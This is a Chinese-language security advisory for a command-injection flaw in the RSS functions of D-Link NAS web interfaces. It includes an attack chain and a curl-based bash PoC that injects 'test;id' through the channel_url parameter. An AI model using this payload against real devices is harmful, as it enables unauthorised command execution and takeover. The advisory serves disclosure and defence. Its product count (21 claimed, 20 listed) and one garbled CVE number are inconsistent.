D-Link多型号网络存储设备download_mgr.cgi命令注入漏洞(CVE-2026-4197)

漏洞信息

漏洞编号

CVE-2026-4197

漏洞类型

命令注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

D-Link DNS-120, DNR-202L, DNS-315L, DNS-320, DNS-320L, DNS-320LW, DNS-321, DNR-322L, DNS-323, DNS-325, DNS-326, DNS-327L, DNR-326, DNS-340L, DNS-343, DNS-345, DNS-726-4, DNS-1100-4, DNS-1200-05, DNS-1550-04

漏洞概述

CVE-2026-2026-4197是D-Link多款网络存储设备(NAS)中存在的一个命令注入漏洞。该漏洞影响D-Link DNS系列和DNR系列共计21款网络存储产品，漏洞位于Web管理界面的/cgi-bin/download_mgr.cgi文件中的多个RSS相关功能函数。由于对用户输入缺乏有效的安全过滤和参数校验，攻击者可以通过构造恶意参数在服务器端执行任意系统命令。漏洞评分CVSS 3.1达到6.3分，属于中危级别。攻击者可利用该漏洞在受影响设备上获取完全控制权，执行恶意代码、安装后门或进行进一步内网渗透。漏洞已于2026年2月5日之前被公开披露，目前厂商尚未发布官方修复补丁。

技术细节

该命令注入漏洞存在于D-Link网络存储设备的Web管理接口中，具体位于/cgi-bin/download_mgr.cgi文件的多个RSS(Really Simple Syndication)功能处理函数中。受影响的函数包括：RSS_Get_Update_Status、RSS_Update、RSS_Channel_AutoDownlaod、RSS_Add、RSS_Channel_Item_Downlaod、RSS_History_Item_List和RSS_Item_List。这些函数在处理RSS订阅更新、频道管理和下载任务时，直接将用户可控的输入参数拼接到系统命令中执行，而未进行任何输入验证或命令隔离。攻击者可以通过在RSS功能参数中注入分号、引号、管道符等特殊字符构造恶意命令载荷，利用低权限账号即可发起远程攻击。成功利用后可获得设备的命令行控制权限，执行任意系统操作。

攻击链分析

STEP 1

步骤1

攻击者识别目标D-Link NAS设备，确认设备型号在受影响列表中

STEP 2

步骤2

攻击者获取设备Web管理界面访问权限(低权限账户即可)

STEP 3

步骤3

构造包含恶意命令载荷的HTTP请求，目标是/cgi-bin/download_mgr.cgi的RSS相关函数

STEP 4

步骤4

在RSS参数(如channel_url、RSS_Update等)中注入系统命令，如使用分号、管道符等特殊字符

STEP 5

步骤5

服务器将注入的命令作为系统命令执行，攻击者获得命令执行结果

STEP 6

步骤6

利用命令执行权限进行进一步攻击，如反弹Shell、安装持久化后门或内网渗透

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/bin/bash
# CVE-2026-4197 D-Link Command Injection PoC
# Target: D-Link DNS/DNR series NAS devices
# Authentication: Low privilege user required

TARGET="http://target-ip/cgi-bin/download_mgr.cgi"
COOKIES="auth_cookie_here"

# Command injection via RSS_Update function
echo "[*] Testing CVE-2026-4197 Command Injection..."
PAYLOAD='test;id'

curl -s -k -X POST "$TARGET" \
  -H "Cookie: $COOKIES" \
  -d "RSS_Update=1&channel_url=$PAYLOAD" \
  | grep -q "uid=" && echo "[+] VULNERABLE! Command injection successful" || echo "[-] Not vulnerable"

echo "[*] PoC execution completed"

影响范围

D-Link DNS-120 (固件 <= 20260205)

D-Link DNR-202L (固件 <= 20260205)

D-Link DNS-315L (固件 <= 20260205)

D-Link DNS-320 (固件 <= 20260205)

D-Link DNS-320L (固件 <= 20260205)

D-Link DNS-320LW (固件 <= 20260205)

D-Link DNS-321 (固件 <= 20260205)

D-Link DNR-322L (固件 <= 20260205)

D-Link DNS-323 (固件 <= 20260205)

D-Link DNS-325 (固件 <= 20260205)

D-Link DNS-326 (固件 <= 20260205)

D-Link DNS-327L (固件 <= 20260205)

D-Link DNR-326 (固件 <= 20260205)

D-Link DNS-340L (固件 <= 20260205)

D-Link DNS-343 (固件 <= 20260205)

D-Link DNS-345 (固件 <= 20260205)

D-Link DNS-726-4 (固件 <= 20260205)

D-Link DNS-1100-4 (固件 <= 20260205)

D-Link DNS-1200-05 (固件 <= 20260205)

D-Link DNS-1550-04 (固件 <= 20260205)

防御指南

临时缓解措施

在官方补丁发布之前，建议采取以下临时缓解措施：1)将设备隔离在独立的VLAN网络中，限制对其Web管理界面的访问来源；2)禁用不必要的远程管理功能，仅允许通过内网受信任IP访问；3)使用防火墙规则限制对TCP 443和80端口的访问；4)监控设备运行状态和系统日志，及时发现异常行为；5)考虑使用VPN或零信任架构进行安全的远程管理。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4197
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4197
3 Details https://www.cvedetails.com/cve/CVE-2026-4197/
4 VulDB https://vuldb.com/cve/CVE-2026-4197
5 Link https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_102/102.md
6 Link https://github.com/wudipjq/my_vuln/blob/main/D-Link8/vuln_103/103.md
7 Link https://vuldb.com/?ctiid.351109
8 Link https://vuldb.com/?id.351109
9 Link https://vuldb.com/?submit.769864
10 Link https://vuldb.com/?submit.769865
11 Link https://vuldb.com/?submit.769866
12 Link https://vuldb.com/?submit.769867
13 Link https://vuldb.com/?submit.769868
14 Link https://vuldb.com/?submit.769869